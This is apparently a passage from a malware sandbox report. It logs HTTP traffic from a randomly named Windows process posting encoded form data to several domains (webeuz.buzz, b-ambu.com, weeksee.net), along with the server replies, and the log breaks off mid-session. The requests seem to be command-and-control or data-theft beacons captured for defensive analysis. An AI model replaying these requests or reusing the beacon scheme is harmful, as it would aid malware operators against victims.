                                                                  Host: www.webeuz.buzz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.webeuz.buzz
                                                                  Referer: http://www.webeuz.buzz/pw0n/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 223
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 75 49 2b 41 61 70 43 43 35 32 6a 36 73 50 66 45 61 4d 68 68 30 6c 38 57 6b 68 75 71 7a 6e 79 6e 2f 57 5a 32 30 5a 67 38 63 51 38 7a 45 31 33 42 62 4c 43 41 34 64 49 2b 63 48 33 57 58 4f 43 66 6d 74 76 62 57 49 6b 48 32 62 72 32 4e 6c 64 4f 6e 42 39 57 30 50 33 70 71 30 69 4b 45 69 38 49 4a 41 49 67 35 47 74 64 79 32 35 6a 7a 62 35 6c 43 39 6c 4d 43 49 50 52 55 50 32 73 6b 6a 49 6c 75 49 6a 32 43 6b 61 69 6a 55 2f 39 31 50 37 53 6a 56 46 61 76 31 78 75 5a 74 6c 59 58 45 38 4e 74 37 47 46 46 58 50 7a 41 57 69 6a 37 6e 78 32 4f 6a 34 55 53 71 32 35 2b 51 4d 4d 6e 42 51 49 4a 65 78 46 49 6d 6e 69 48 54 47 49 75 43 42 6b 45 50 6b 52 52 4d 55 3d
                                                                  Data Ascii: Vt8pNT=uI+AapCC52j6sPfEaMhh0l8Wkhuqznyn/WZ20Zg8cQ8zE13BbLCA4dI+cH3WXOCfmtvbWIkH2br2NldOnB9W0P3pq0iKEi8IJAIg5Gtdy25jzb5lC9lMCIPRUP2skjIluIj2CkaijU/91P7SjVFav1xuZtlYXE8Nt7GFFXPzAWij7nx2Oj4USq25+QMMnBQIJexFImniHTGIuCBkEPkRRMU=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.44989475.2.103.23803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:46:43.895654917 CEST10830OUTPOST /pw0n/ HTTP/1.1
                                                                  Host: www.webeuz.buzz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.webeuz.buzz
                                                                  Referer: http://www.webeuz.buzz/pw0n/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10303
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 75 49 2b 41 61 70 43 43 35 32 6a 36 73 50 66 45 61 4d 68 68 30 6c 38 57 6b 68 75 71 7a 6e 79 6e 2f 57 5a 32 30 5a 67 38 63 51 6b 7a 45 47 50 42 63 59 71 41 37 64 49 2b 66 48 33 74 58 4f 43 53 6d 74 33 66 57 49 70 6c 32 59 54 32 4e 48 6c 4f 73 51 39 57 76 2f 33 70 6e 55 69 50 61 53 38 5a 4a 42 34 6b 35 43 42 64 79 32 35 6a 7a 64 64 6c 56 38 6c 4d 45 49 50 53 58 50 32 77 67 6a 49 4a 75 49 4b 4a 43 6e 32 63 6a 46 66 39 31 73 54 53 6b 6e 74 61 75 56 78 57 61 74 6c 2b 58 45 77 6b 74 34 79 6a 46 58 37 4e 41 55 2b 6a 36 41 4d 77 5a 41 55 4c 4f 61 79 52 6c 41 59 30 73 77 34 6a 46 35 38 2b 45 6a 6e 32 54 78 66 68 69 79 52 71 63 2b 70 62 46 62 35 68 45 68 72 49 6c 5a 39 75 31 31 37 6d 2b 72 78 38 72 33 52 52 38 61 4e 52 70 32 6f 6e 61 62 62 6d 43 47 6d 37 55 35 6a 59 56 46 6d 2b 76 72 57 7a 32 75 67 49 73 66 52 66 68 6f 4f 70 6d 54 64 35 71 61 37 2b 39 2f 78 59 59 50 62 4b 64 67 2f 48 77 2f 57 32 30 79 31 74 74 66 52 42 30 69 77 6c 6a 42 59 2b 71 6a 2b 76 74 79 48 77 75 78 41 6b 55 61 47 [TRUNCATED]
                                                                  Data Ascii: Vt8pNT=uI+AapCC52j6sPfEaMhh0l8Wkhuqznyn/WZ20Zg8cQkzEGPBcYqA7dI+fH3tXOCSmt3fWIpl2YT2NHlOsQ9Wv/3pnUiPaS8ZJB4k5CBdy25jzddlV8lMEIPSXP2wgjIJuIKJCn2cjFf91sTSkntauVxWatl+XEwkt4yjFX7NAU+j6AMwZAULOayRlAY0sw4jF58+Ejn2TxfhiyRqc+pbFb5hEhrIlZ9u117m+rx8r3RR8aNRp2onabbmCGm7U5jYVFm+vrWz2ugIsfRfhoOpmTd5qa7+9/xYYPbKdg/Hw/W20y1ttfRB0iwljBY+qj+vtyHwuxAkUaGSEN61SODQCw9vf2ZxsgSUwoVeMDStWu/Tice+QVbxJvbW3wWD+RqjGIEL8pwhP9oN7G2Ysyriph9cGizkNQn5c45E34vY0lBq/JQh6uLSbDvVUJ5G/ssjVQQ6lTKCY91rrei3BH3Z40Fc2mfjjgNvMK6ioHwaiJrtXnoKNXazYFSjZqeOf3wUaJQzujgl+SaPKbPAiRd2enEJuTUoN3o8qc52hdLCQ7U4sNsdjOQWYw/Z5sjP46RTv9oFQBKKebsts1SpyNEpnTHTTjBsK0YJ52dkvlI5wd+E0QDZBe0E+JeTO7YxiHq+WuuYR/tc/ECFGCljXXq0W/CKOWbD69aDlsxjiE4XIe0zaAEq+gwVf54zPn+VC9ZMMUATjbpijw/c/dASmZPEPyeBqI7bNfC9AeZvtu8J26BHQgu7jWdq6mEnXZJzjV9oxD6ntTLZZ3QmiELxwrRc5j6aZUrRm0SoBZwMLnxkcR19ja3BXNTg4AMTyI2eO53Y05ujIOXMS/F/dN1r9Z7twoBsHOXB1bllFLtVGX6X3l8EbIJhwJo88f5oYiCcGnNJxXyqJ8YXS9kS46fv2r2jq+n7FstVldMn5DSVSI/IMFIyfvfwkZtgrKRJJeyeoXHn4S6/wCY3pdHUSIHf0bJ3X5EWAnelIpiPlcMx8a53qetfw [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.44991475.2.103.23803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:46:46.438786030 CEST462OUTGET /pw0n/?Vt8pNT=jKWgZZqB+xPbw8PyTqx38QFiti6jsVGm8xRMwOckZz0bSXvbA9Gl3dJBJEH5Yfm2q9TaWbUP2YXuBUhdjRY21f3om0mDchB/JCkr7kUgsXxGn5FGHqIfEsY=&e4x=ktCxONu0 HTTP/1.1
                                                                  Host: www.webeuz.buzz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Oct 11, 2024 16:46:46.899554014 CEST395INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Fri, 11 Oct 2024 14:46:46 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 255
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 74 38 70 4e 54 3d 6a 4b 57 67 5a 5a 71 42 2b 78 50 62 77 38 50 79 54 71 78 33 38 51 46 69 74 69 36 6a 73 56 47 6d 38 78 52 4d 77 4f 63 6b 5a 7a 30 62 53 58 76 62 41 39 47 6c 33 64 4a 42 4a 45 48 35 59 66 6d 32 71 39 54 61 57 62 55 50 32 59 58 75 42 55 68 64 6a 52 59 32 31 66 33 6f 6d 30 6d 44 63 68 42 2f 4a 43 6b 72 37 6b 55 67 73 58 78 47 6e 35 46 47 48 71 49 66 45 73 59 3d 26 65 34 78 3d 6b 74 43 78 4f 4e 75 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vt8pNT=jKWgZZqB+xPbw8PyTqx38QFiti6jsVGm8xRMwOckZz0bSXvbA9Gl3dJBJEH5Yfm2q9TaWbUP2YXuBUhdjRY21f3om0mDchB/JCkr7kUgsXxGn5FGHqIfEsY=&e4x=ktCxONu0"}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.44994684.32.84.32803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:46:52.006825924 CEST725OUTPOST /iuk8/ HTTP/1.1
                                                                  Host: www.b-ambu.com
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.b-ambu.com
                                                                  Referer: http://www.b-ambu.com/iuk8/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 6d 4f 2b 63 47 30 4f 76 61 6c 42 47 4f 58 45 77 6f 42 58 41 56 37 38 61 5a 78 6d 64 34 77 4b 6f 68 30 57 44 55 47 2f 59 55 4c 74 54 42 36 44 34 58 54 6f 74 79 37 65 50 4e 6b 30 58 36 4a 66 78 53 6a 31 67 6b 42 32 30 6c 47 6b 67 4f 71 77 50 57 59 6b 66 78 57 49 43 61 47 74 57 65 67 34 4b 64 30 58 68 71 78 41 71 54 30 38 73 4e 42 43 49 4e 72 70 4e 65 42 4f 38 4e 64 2b 74 2b 61 65 59 4a 77 7a 4e 51 55 59 7a 36 38 5a 6b 42 4f 76 58 59 46 30 58 50 51 6c 67 59 38 51 2b 46 61 37 44 78 77 46 54 39 34 37 66 48 39 4e 6e 45 62 49 5a 54 71 34 6d 32 42 58 52 42 49 6e 46 4f 4d 30 62 58 41 3d 3d
                                                                  Data Ascii: Vt8pNT=mO+cG0OvalBGOXEwoBXAV78aZxmd4wKoh0WDUG/YULtTB6D4XToty7ePNk0X6JfxSj1gkB20lGkgOqwPWYkfxWICaGtWeg4Kd0XhqxAqT08sNBCINrpNeBO8Nd+t+aeYJwzNQUYz68ZkBOvXYF0XPQlgY8Q+Fa7DxwFT947fH9NnEbIZTq4m2BXRBInFOM0bXA==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.44996284.32.84.32803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:46:54.552618027 CEST745OUTPOST /iuk8/ HTTP/1.1
                                                                  Host: www.b-ambu.com
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.b-ambu.com
                                                                  Referer: http://www.b-ambu.com/iuk8/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 223
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 6d 4f 2b 63 47 30 4f 76 61 6c 42 47 50 32 30 77 70 69 76 41 45 62 38 62 58 52 6d 64 68 67 4b 73 68 31 71 44 55 48 36 46 55 2b 31 54 42 65 4c 34 57 53 6f 74 78 37 65 50 5a 30 30 53 6e 35 66 6d 53 6a 78 6f 6b 41 61 30 6c 41 49 67 4f 71 67 50 56 72 63 65 78 47 49 41 57 6d 74 51 54 41 34 4b 64 30 58 68 71 78 56 4e 54 30 30 73 4e 78 53 49 4d 4a 42 4d 54 68 4f 2f 45 39 2b 74 36 61 65 63 4a 77 7a 37 51 56 45 5a 36 2b 68 6b 42 4d 6e 58 59 55 30 55 56 41 6c 6d 63 38 52 49 42 70 47 73 32 68 49 49 79 4c 6e 34 4f 4f 52 45 49 39 5a 44 43 62 5a 78 6b 42 7a 69 63 50 75 78 44 50 4a 53 4d 4c 49 6b 2b 47 64 2f 53 79 63 6c 48 7a 55 52 71 71 2f 46 47 6d 30 3d
                                                                  Data Ascii: Vt8pNT=mO+cG0OvalBGP20wpivAEb8bXRmdhgKsh1qDUH6FU+1TBeL4WSotx7ePZ00Sn5fmSjxokAa0lAIgOqgPVrcexGIAWmtQTA4Kd0XhqxVNT00sNxSIMJBMThO/E9+t6aecJwz7QVEZ6+hkBMnXYU0UVAlmc8RIBpGs2hIIyLn4OOREI9ZDCbZxkBzicPuxDPJSMLIk+Gd/SyclHzURqq/FGm0=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.44997984.32.84.32803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:46:57.098006964 CEST10827OUTPOST /iuk8/ HTTP/1.1
                                                                  Host: www.b-ambu.com
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.b-ambu.com
                                                                  Referer: http://www.b-ambu.com/iuk8/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10303
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 6d 4f 2b 63 47 30 4f 76 61 6c 42 47 50 32 30 77 70 69 76 41 45 62 38 62 58 52 6d 64 68 67 4b 73 68 31 71 44 55 48 36 46 55 2b 39 54 42 70 4c 34 58 78 51 74 77 37 65 50 47 45 30 54 6e 35 66 6e 53 6a 4a 73 6b 42 6e 42 6c 44 38 67 50 4a 59 50 55 61 63 65 2f 47 49 41 59 32 74 56 65 67 35 4f 64 30 48 6c 71 78 46 4e 54 30 30 73 4e 33 65 49 46 37 70 4d 41 52 4f 38 4e 64 2b 62 2b 61 65 30 4a 30 66 72 51 57 6f 6a 36 4f 42 6b 42 73 33 58 62 6d 63 55 65 41 6c 6b 51 63 52 41 42 70 4b 7a 32 6c 6f 45 79 49 37 43 4f 4a 35 45 43 38 78 66 64 36 31 4d 6d 43 72 4e 42 39 57 54 62 4d 74 4e 41 37 73 63 76 55 42 57 49 47 4d 37 41 52 4e 57 78 6f 54 45 54 77 31 4b 52 72 50 59 38 44 4a 5a 5a 6e 43 47 43 30 4c 76 6b 61 31 7a 30 72 6d 49 47 41 52 6d 31 52 37 76 31 2b 36 2f 76 65 4c 73 33 44 62 70 61 44 30 31 72 4c 77 49 66 6a 36 4a 36 70 4f 67 6f 34 67 6c 54 5a 78 42 44 61 78 44 75 56 35 51 72 4a 6f 72 61 70 77 42 69 69 59 55 4b 38 48 6e 6a 47 37 31 78 45 34 42 4f 36 78 62 70 75 75 33 43 4b 64 41 42 30 72 [TRUNCATED]
                                                                  Data Ascii: Vt8pNT=mO+cG0OvalBGP20wpivAEb8bXRmdhgKsh1qDUH6FU+9TBpL4XxQtw7ePGE0Tn5fnSjJskBnBlD8gPJYPUace/GIAY2tVeg5Od0HlqxFNT00sN3eIF7pMARO8Nd+b+ae0J0frQWoj6OBkBs3XbmcUeAlkQcRABpKz2loEyI7COJ5EC8xfd61MmCrNB9WTbMtNA7scvUBWIGM7ARNWxoTETw1KRrPY8DJZZnCGC0Lvka1z0rmIGARm1R7v1+6/veLs3DbpaD01rLwIfj6J6pOgo4glTZxBDaxDuV5QrJorapwBiiYUK8HnjG71xE4BO6xbpuu3CKdAB0rwOZv7qR5pJsKhvoO+6/WSrlmjaSfvkAlHmqvwSSAtk5PkibKLdtqhNXj6YktjhQrBA5Zku0vt1YUPqzYN3R8QY453ZlkHKA2wokjTCzicjZg6vVID/kXjLhQWF9nbAuBTtvFfOc65T4CBNDQ5BfdgfU6fVtRwUxypXgE+aqN0KSuczYSRI04q/dujwSUbrJT7QcqGG/yh/J6DeQRBteowjfIndXZtArUEF5LONMWe9OuR5S0cerWM1PVJD6eiNk5OcqmWXVdcwKr0GB947TMsnYb6GYG+qyJpz+d3v2rGN8piRfsLDIJuNTDcAnwkv1+9bIta5gALIy2t86Q4Xf1l1t42TVvs8/Nm8dG5x7vhI9iOCPRkN/Eln+c1WnVWBIzhzjJ54jlK/lljB9KJ87JlFz8Xa/RnWX+kaApVtqm2Xmx4RQK1wdgb9pGZYvfOizcyz+aAP+9OvrriRSlY4e0Cozh+F2BsvSvOkwKAs4QsP5eV1d38/L9O7tUsdVj7A+EpGQd8N0A1PHAzpV0tyGQOz1R7sV99rAsUDPZ7QdQcN7vq4Ecz1uIqdJoEqLicwKgMCssWkZGLAdPJh4MzB6Qz8yUkvnnbvmUD+DOKd4eDvQC+Tecp4HKlYLW0mrpqgFKTTtWeoespQaOpXE4HwN603hxrdcYrvmP9D [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.44999784.32.84.32803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:46:59.646855116 CEST461OUTGET /iuk8/?e4x=ktCxONu0&Vt8pNT=rMW8FEGQdm97FGtaoxXiHNwQVR6R/A+6gHbLU36mRaIlSKTub3c0+o2OYHMPzrTne2tl6yO2tBcnHpARWLNmulEVVzZjbBkPJkvKkDIrLUALH1enLsdJRAo= HTTP/1.1
                                                                  Host: www.b-ambu.com
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Oct 11, 2024 16:47:00.102770090 CEST1236INHTTP/1.1 200 OK
                                                                  Server: hcdn
                                                                  Date: Fri, 11 Oct 2024 14:47:00 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 10072
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  x-hcdn-request-id: 0a5cd84bb2108b97bf56b129de1387d2-bos-edge2
                                                                  Expires: Fri, 11 Oct 2024 14:46:59 GMT
                                                                  Cache-Control: no-cache
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                  Oct 11, 2024 16:47:00.102808952 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                  Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                  Oct 11, 2024 16:47:00.102832079 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                  Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                  Oct 11, 2024 16:47:00.102845907 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                  Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                  Oct 11, 2024 16:47:00.102860928 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                  Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                  Oct 11, 2024 16:47:00.102874041 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                  Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                  Oct 11, 2024 16:47:00.102890015 CEST776INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                  Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                  Oct 11, 2024 16:47:00.102904081 CEST1236INData Raw: 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67 74 68 3b 66
                                                                  Data Ascii: )}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input
                                                                  Oct 11, 2024 16:47:00.102921963 CEST984INData Raw: 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b 69 3c 76 3b
                                                                  Data Ascii: (m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.450011172.232.112.221803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:06.132155895 CEST728OUTPOST /4p3r/ HTTP/1.1
                                                                  Host: www.weeksee.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.weeksee.net
